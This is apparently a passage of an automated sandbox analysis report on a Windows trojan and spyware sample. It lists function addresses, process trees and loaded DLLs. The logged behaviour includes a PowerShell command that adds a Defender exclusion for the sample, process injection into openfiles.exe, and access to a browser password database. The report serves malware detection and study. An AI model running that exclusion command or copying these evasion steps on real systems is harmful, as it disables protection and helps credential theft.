                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CC961D6_2_07CC961D
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CC96186_2_07CC9618
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CC7D8D6_2_07CC7D8D
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CC2C7D6_2_07CC2C7D
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CC2C756_2_07CC2C75
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CCB41D6_2_07CCB41D
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CE1AFD6_2_07CE1AFD
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeCode function: 6_2_07CC10C46_2_07CC10C4
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A1E4F67_2_04A1E4F6
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A144207_2_04A14420
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A224467_2_04A22446
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A305917_2_04A30591
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049705357_2_04970535
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0498C6E07_2_0498C6E0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496C7C07_2_0496C7C0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049947507_2_04994750
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049707707_2_04970770
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A020007_2_04A02000
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A301AA7_2_04A301AA
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A281CC7_2_04A281CC
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049601007_2_04960100
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A0A1187_2_04A0A118
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049F81587_2_049F8158
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049F02C07_2_049F02C0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A102747_2_04A10274
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A303E67_2_04A303E6
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0497E3F07_2_0497E3F0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2A3527_2_04A2A352
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A10CB57_2_04A10CB5
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04960CF27_2_04960CF2
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04970C007_2_04970C00
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04988DBF7_2_04988DBF
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496ADE07_2_0496ADE0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0497AD007_2_0497AD00
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A0CD1F7_2_04A0CD1F
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04982E907_2_04982E90
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2CE937_2_04A2CE93
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2EEDB7_2_04A2EEDB
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2EE267_2_04A2EE26
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04970E597_2_04970E59
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049EEFA07_2_049EEFA0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04962FC87_2_04962FC8
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A12F307_2_04A12F30
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04990F307_2_04990F30
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049B2F287_2_049B2F28
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049E4F407_2_049E4F40
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049568B87_2_049568B8
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0499E8F07_2_0499E8F0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049728407_2_04972840
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0497A8407_2_0497A840
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A3A9A67_2_04A3A9A6
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049729A07_2_049729A0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049869627_2_04986962
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0496EA807_2_0496EA80
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A26BD77_2_04A26BD7
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2AB407_2_04A2AB40
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2F43F7_2_04A2F43F
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049614607_2_04961460
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A0D5B07_2_04A0D5B0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A275717_2_04A27571
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A216CC7_2_04A216CC
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2F7B07_2_04A2F7B0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2F0E07_2_04A2F0E0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A270E97_2_04A270E9
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049770C07_2_049770C0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A1F0CC7_2_04A1F0CC
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0497B1B07_2_0497B1B0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A3B16B7_2_04A3B16B
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0495F1727_2_0495F172
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049A516C7_2_049A516C
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049752A07_2_049752A0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A112ED7_2_04A112ED
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0498B2C07_2_0498B2C0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0498D2F07_2_0498D2F0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049B739A7_2_049B739A
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2132D7_2_04A2132D
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0495D34C7_2_0495D34C
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2FCF27_2_04A2FCF2
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049E9C327_2_049E9C32
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0498FDC07_2_0498FDC0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A27D737_2_04A27D73
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04973D407_2_04973D40
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A21D5A7_2_04A21D5A
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04979EB07_2_04979EB0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04971F927_2_04971F92
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2FFB17_2_04A2FFB1
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04933FD27_2_04933FD2
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04933FD57_2_04933FD5
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2FF097_2_04A2FF09
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049738E07_2_049738E0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049DD8007_2_049DD800
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A059107_2_04A05910
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049799507_2_04979950
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0498B9507_2_0498B950
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A11AA37_2_04A11AA3
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A0DAAC7_2_04A0DAAC
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049B5AA07_2_049B5AA0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A1DAC67_2_04A1DAC6
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A27A467_2_04A27A46
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2FA497_2_04A2FA49
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049E3A6C7_2_049E3A6C
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0498FB807_2_0498FB80
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049ADBF97_2_049ADBF9
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_049E5BF07_2_049E5BF0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_04A2FB767_2_04A2FB76
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_007A1F607_2_007A1F60
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0079D0707_2_0079D070
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0079B0807_2_0079B080
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0079B1D07_2_0079B1D0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0079B1C47_2_0079B1C4
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0079B2977_2_0079B297
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_007A55F07_2_007A55F0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_007A37F07_2_007A37F0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_007A37EB7_2_007A37EB
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_007BBCD07_2_007BBCD0
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0079CE507_2_0079CE50
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0079CE487_2_0079CE48
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0484E6CC7_2_0484E6CC
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0484E2B67_2_0484E2B6
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0484E3D37_2_0484E3D3
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0484D8387_2_0484D838
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: 7_2_0484CB237_2_0484CB23
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: String function: 0188F290 appears 103 times
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: String function: 01857E54 appears 99 times
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: String function: 017FB970 appears 262 times
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: String function: 0187EA12 appears 86 times
                      Source: C:\Users\user\Desktop\IETC-24017.exeCode function: String function: 01845130 appears 58 times
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 0495B970 appears 257 times
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 049B7E54 appears 99 times
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 049DEA12 appears 86 times
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 049A5130 appears 58 times
                      Source: C:\Windows\SysWOW64\openfiles.exeCode function: String function: 049EF290 appears 103 times
                      Source: IETC-24017.exe, 00000000.00000002.1692106162.0000000006D90000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs IETC-24017.exe
                      Source: IETC-24017.exe, 00000000.00000002.1695361828.00000000074E0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs IETC-24017.exe
                      Source: IETC-24017.exe, 00000000.00000002.1683716815.0000000002701000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs IETC-24017.exe
                      Source: IETC-24017.exe, 00000000.00000002.1682805496.000000000098E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs IETC-24017.exe
                      Source: IETC-24017.exe, 00000003.00000002.1822408651.00000000018FD000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs IETC-24017.exe
                      Source: IETC-24017.exe, 00000003.00000002.1821955897.000000000138E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameopnfiles.exej% vs IETC-24017.exe
                      Source: IETC-24017.exe, 00000003.00000002.1821955897.0000000001368000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameopnfiles.exej% vs IETC-24017.exe
                      Source: IETC-24017.exeBinary or memory string: OriginalFilenameWyjV.exe@ vs IETC-24017.exe
                      Source: IETC-24017.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: IETC-24017.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 0.2.IETC-24017.exe.6d90000.3.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.IETC-24017.exe.371e790.1.raw.unpack, id.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, sPymH4i2o29WVBQPb7.csSecurity API names: _0020.SetAccessControl
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, sPymH4i2o29WVBQPb7.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, sPymH4i2o29WVBQPb7.csSecurity API names: _0020.AddAccessRule
                      Source: 0.2.IETC-24017.exe.74e0000.4.raw.unpack, Iht7kKNJwU57iwhQqv.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@11/7@18/14
                      Source: C:\Users\user\Desktop\IETC-24017.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\IETC-24017.exe.logJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3448:120:WilError_03
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kll1lkb0.amr.ps1Jump to behavior
                      Source: IETC-24017.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: IETC-24017.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Users\user\Desktop\IETC-24017.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: openfiles.exe, 00000007.00000003.2006355424.0000000002BCB000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000003.2006245399.0000000002BAA000.00000004.00000020.00020000.00000000.sdmp, openfiles.exe, 00000007.00000002.4123887775.0000000002BCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: IETC-24017.exeReversingLabs: Detection: 42%
                      Source: unknownProcess created: C:\Users\user\Desktop\IETC-24017.exe "C:\Users\user\Desktop\IETC-24017.exe"
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe"
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess created: C:\Users\user\Desktop\IETC-24017.exe "C:\Users\user\Desktop\IETC-24017.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeProcess created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"
                      Source: C:\Windows\SysWOW64\openfiles.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\IETC-24017.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeProcess created: C:\Users\user\Desktop\IETC-24017.exe "C:\Users\user\Desktop\IETC-24017.exe"Jump to behavior
                      Source: C:\Program Files (x86)\HAAlyPNaOhHHVbXNykVdTFHVVIFIQJkRdRstvzBMVDGJOHXsxgOmqOWPKexctSTZypxpxZMxQwddeiY\UFUUPGsATdE.exeProcess created: C:\Windows\SysWOW64\openfiles.exe "C:\Windows\SysWOW64\openfiles.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\openfiles.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: riched20.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: usp10.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: msls31.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\IETC-24017.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
